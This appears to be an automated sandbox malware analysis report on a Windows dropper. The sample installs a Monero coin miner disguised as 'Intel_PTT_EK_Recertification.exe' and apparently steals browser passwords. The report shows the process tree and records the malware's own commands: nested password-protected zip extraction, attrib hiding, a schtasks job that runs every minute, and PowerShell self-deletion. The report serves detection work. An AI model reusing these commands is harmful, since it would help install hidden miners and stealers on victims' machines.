                          Source: Yara matchFile source: 41.3.svchost.exe.5010000.7.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 35.3.80f68847d3.exe.55a0000.6.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 41.3.svchost.exe.4df0000.6.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000023.00000003.2358425905.00000000055A0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000029.00000003.2363157225.0000000004DF0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000023.00000003.2358664230.00000000057C0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000029.00000003.2363376254.0000000005010000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 80f68847d3.exe PID: 7252, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7564, type: MEMORYSTR

                          System Summary

                          barindex
                          Source: 36.3.Intel_PTT_EK_Recertification.exe.1ab56c60000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                          Source: 36.3.Intel_PTT_EK_Recertification.exe.1ab56c60000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                          Source: 37.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                          Source: 37.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                          Source: 36.3.Intel_PTT_EK_Recertification.exe.1ab56c60000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                          Source: 36.3.Intel_PTT_EK_Recertification.exe.1ab56c60000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                          Source: 00000024.00000003.2335547631.000001AB56C60000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                          Source: 00000024.00000003.2335547631.000001AB56C60000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects coinmining malware Author: ditekSHen
                          Source: file.bin.12.drZip Entry: encrypted
                          Source: file.exeStatic PE information: section name:
                          Source: file.exeStatic PE information: section name: .idata
                          Source: skotes.exe.0.drStatic PE information: section name:
                          Source: skotes.exe.0.drStatic PE information: section name: .idata
                          Source: random[1].exe1.6.drStatic PE information: section name:
                          Source: random[1].exe1.6.drStatic PE information: section name: .idata
                          Source: random[1].exe1.6.drStatic PE information: section name:
                          Source: 80f68847d3.exe.6.drStatic PE information: section name:
                          Source: 80f68847d3.exe.6.drStatic PE information: section name: .idata
                          Source: 80f68847d3.exe.6.drStatic PE information: section name:
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_0061CB97 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,6_2_0061CB97
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008D78BB0_2_008D78BB
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008D70490_2_008D7049
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008D88600_2_008D8860
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008D31A80_2_008D31A8
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00894B300_2_00894B30
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00894DE00_2_00894DE0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008D2D100_2_008D2D10
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008D779B0_2_008D779B
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008C7F360_2_008C7F36
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_006488602_2_00648860
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_006470492_2_00647049
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_006478BB2_2_006478BB
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_006431A82_2_006431A8
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00604B302_2_00604B30
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00642D102_2_00642D10
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00604DE02_2_00604DE0
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00637F362_2_00637F36
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_0064779B2_2_0064779B
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_0060E5306_2_0060E530
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_006261926_2_00626192
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_006488606_2_00648860
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00604B306_2_00604B30
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00642D106_2_00642D10
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00604DE06_2_00604DE0
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00620E136_2_00620E13
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_006470496_2_00647049
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_006431A86_2_006431A8
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_006216026_2_00621602
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_0064779B6_2_0064779B
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_006478BB6_2_006478BB
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00623DF16_2_00623DF1
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00637F366_2_00637F36
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: 8_2_009210008_2_00921000
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: 8_2_00924C8C8_2_00924C8C
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: 8_2_00936F3A8_2_00936F3A
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: 10_2_0092100010_2_00921000
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: 10_2_00924C8C10_2_00924C8C
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: 10_2_00936F3A10_2_00936F3A
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: 11_3_013BEB6911_3_013BEB69
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: 11_3_013B97FD11_3_013B97FD
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: 11_3_01350C8411_3_01350C84
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: 11_3_01350C8411_3_01350C84
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: 11_3_01350BF811_3_01350BF8
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: 11_3_01350BF811_3_01350BF8
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: 11_3_01350C8411_3_01350C84
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: 11_3_01350C8411_3_01350C84
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: 11_3_01350BF811_3_01350BF8
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: 11_3_01350BF811_3_01350BF8
                          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[1].exe C6491D7A6D70C7C51BACA7436464667B4894E4989FA7C5E05068DDE4699E1CBF
                          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[2].exe 3D51B9523B387859BC0D94246DFB216CFA82F9D650C8D11BE11ED67F70E7440B
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeProcess token adjusted: SecurityJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 00638E10 appears 35 times
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 0061DF80 appears 64 times
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 0061D663 appears 39 times
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 0061D942 appears 85 times
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 006180C0 appears 262 times
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 0061D64E appears 67 times
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 00617A00 appears 38 times
                          Source: C:\Users\user\Desktop\file.exeCode function: String function: 008A80C0 appears 130 times
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: String function: 0092B767 appears 42 times
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: String function: 00925190 appears 92 times
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: String function: 0092F534 appears 34 times
                          Source: C:\Users\user\AppData\Local\Temp\1016853001\80f68847d3.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7252 -s 640
                          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: 36.3.Intel_PTT_EK_Recertification.exe.1ab56c60000.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                          Source: 36.3.Intel_PTT_EK_Recertification.exe.1ab56c60000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                          Source: 37.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                          Source: 37.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                          Source: 36.3.Intel_PTT_EK_Recertification.exe.1ab56c60000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                          Source: 36.3.Intel_PTT_EK_Recertification.exe.1ab56c60000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                          Source: 00000024.00000003.2335547631.000001AB56C60000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                          Source: 00000024.00000003.2335547631.000001AB56C60000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                          Source: file.exeStatic PE information: Section: ZLIB complexity 0.9981320248637602
                          Source: skotes.exe.0.drStatic PE information: Section: ZLIB complexity 0.9981320248637602
                          Source: random[2].exe.6.drStatic PE information: Section: .bss ZLIB complexity 1.0003407005613125
                          Source: random[2].exe.6.drStatic PE information: Section: .bss ZLIB complexity 1.0003407005613125
                          Source: 9f237e29d5.exe.6.drStatic PE information: Section: .bss ZLIB complexity 1.0003407005613125
                          Source: 9f237e29d5.exe.6.drStatic PE information: Section: .bss ZLIB complexity 1.0003407005613125
                          Source: random[1].exe.6.drStatic PE information: Section: .bss ZLIB complexity 1.0003343485169491
                          Source: random[1].exe.6.drStatic PE information: Section: .bss ZLIB complexity 1.0003343485169491
                          Source: d2cb36d600.exe.6.drStatic PE information: Section: .bss ZLIB complexity 1.0003343485169491
                          Source: d2cb36d600.exe.6.drStatic PE information: Section: .bss ZLIB complexity 1.0003343485169491
                          Source: random[1].exe1.6.drStatic PE information: Section: ZLIB complexity 0.9958811404520295
                          Source: random[1].exe1.6.drStatic PE information: Section: kucwzsnp ZLIB complexity 0.9928972469567178
                          Source: 80f68847d3.exe.6.drStatic PE information: Section: ZLIB complexity 0.9958811404520295
                          Source: 80f68847d3.exe.6.drStatic PE information: Section: kucwzsnp ZLIB complexity 0.9928972469567178
                          Source: 80f68847d3.exe, 00000023.00000003.2339759920.0000000004F38000.00000004.00001000.00020000.00000000.sdmp, 80f68847d3.exe, 00000023.00000002.2383285856.00000000008C9000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: .a_po^ ojYd.o B U.R G v.Q_F& ZNH K.9.sV`OQ qOq_A( N5.j P.X z.k.Yf_HL.P.L`.C Ue_q_B_t.h{_yr\=A f.3_q_Fvb_H_bm W.UP#.by_iY.Yw I.Y_G p.3c g.Zy S v.U.N C_m Z_i.H_j B l_DH_Pd.iz_O.f~ U z_Mv_d7 T Mz.f.594/}_m kS.v.D u.rZu.S G.N_x.V J.Q.G FO^.X<.6_fv.V ny.L,_E.2.m I_l.b$ Mx sZ.K! p.Y.U.V:U.89 R_H F3.d_R A UQ.C_y y Y Jb.Q_S.N.s< l_Ab~[_w9zV?!C9.N_HQ)*_n R.tP Ww_u aU;.V EPk Xr.Q0.y.A!]_b!7 g.R_pF.E_b o.o.q.o_E.T_rdfw.c}_ck.4.Y_w:_P.B(#`_xy_i.3_Y.A_N.q.6.YE_S_T.R H n.R_d_F.V.s_R68).I aL q.H b.W.Q!.r b_w c c$_va.X_v.tRm l.sln_D c! C.7_F m M_j6 zr.w F i}%_N.RB A7_wG_m.4_A#&.G mCx.Q_s N pTS.n.e C.4_v_C_Q.e J q7E V P.LP_Q.kTN_c.F.D gc.hT_s_Q1
                          Source: svchost.exe, 00000029.00000002.2372633132.0000000002ED0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: .VbP)U
                          Source: 80f68847d3.exe, 00000023.00000003.2339759920.0000000004F38000.00000004.00001000.00020000.00000000.sdmp, 80f68847d3.exe, 00000023.00000002.2383285856.00000000008C9000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: .tRm l.sln_D c! C.7_F m M_j6 zr.w F i}%_N.RB A7_wG_m.4_A#&.G mCx.Q_s N pTS.n.e C.4_v_
                          Source: classification engineClassification label: mal100.troj.spyw.evad.mine.winEXE@72/40@3/6
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[1].exeJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7876:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6108:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3504:120:WilError_03
                          Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-41f5ca1f-12f2-e123ed-b12badd5efaa}
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7924:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8036:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7104:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3700:120:WilError_03
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7892:120:WilError_03
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016852001\95ae71a780.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\explorer.exe
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\explorer.exe
                          Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: d2cb36d600.exe, 0000000B.00000003.2191915109.0000000003A6A000.00000004.00000800.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2191489535.0000000003A86000.00000004.00000800.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002F.00000003.2468094170.0000000003999000.00000004.00000800.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002F.00000003.2490342785.0000000003993000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                          Source: file.exeVirustotal: Detection: 55%
                          Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                          Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                          Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                          Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exe "C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exe"
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeProcess created: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exe "C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exe"
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeProcess created: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exe "C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exe"
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1016852001\95ae71a780.exe "C:\Users\user\AppData\Local\Temp\1016852001\95ae71a780.exe"
                          Source: C:\Users\user\AppData\Local\Temp\1016852001\95ae71a780.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 65,10
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextracted
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextracted
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextracted
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextracted
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextracted
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextracted
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextracted
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextracted
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +H "in.exe"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe"
                          Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\attrib.exe attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                          Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\attrib.exe attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                          Source: C:\Windows\System32\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
                          Source: C:\Windows\System32\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
                          Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1016853001\80f68847d3.exe "C:\Users\user\AppData\Local\Temp\1016853001\80f68847d3.exe"
                          Source: unknownProcess created: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\explorer.exe explorer.exe
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.1.10.1
                          Source: C:\Users\user\AppData\Local\Temp\1016853001\80f68847d3.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
                          Source: C:\Users\user\AppData\Local\Temp\1016853001\80f68847d3.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7252 -s 640
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exe "C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exe"
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeProcess created: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exe "C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exe"
                          Source: unknownProcess created: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exe "C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1016852001\95ae71a780.exe "C:\Users\user\AppData\Local\Temp\1016852001\95ae71a780.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1016853001\80f68847d3.exe "C:\Users\user\AppData\Local\Temp\1016853001\80f68847d3.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exe "C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeProcess created: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exe "C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exe"Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeProcess created: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exe "C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exe"Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016852001\95ae71a780.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 65,10Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextractedJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextractedJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextractedJump to behavior
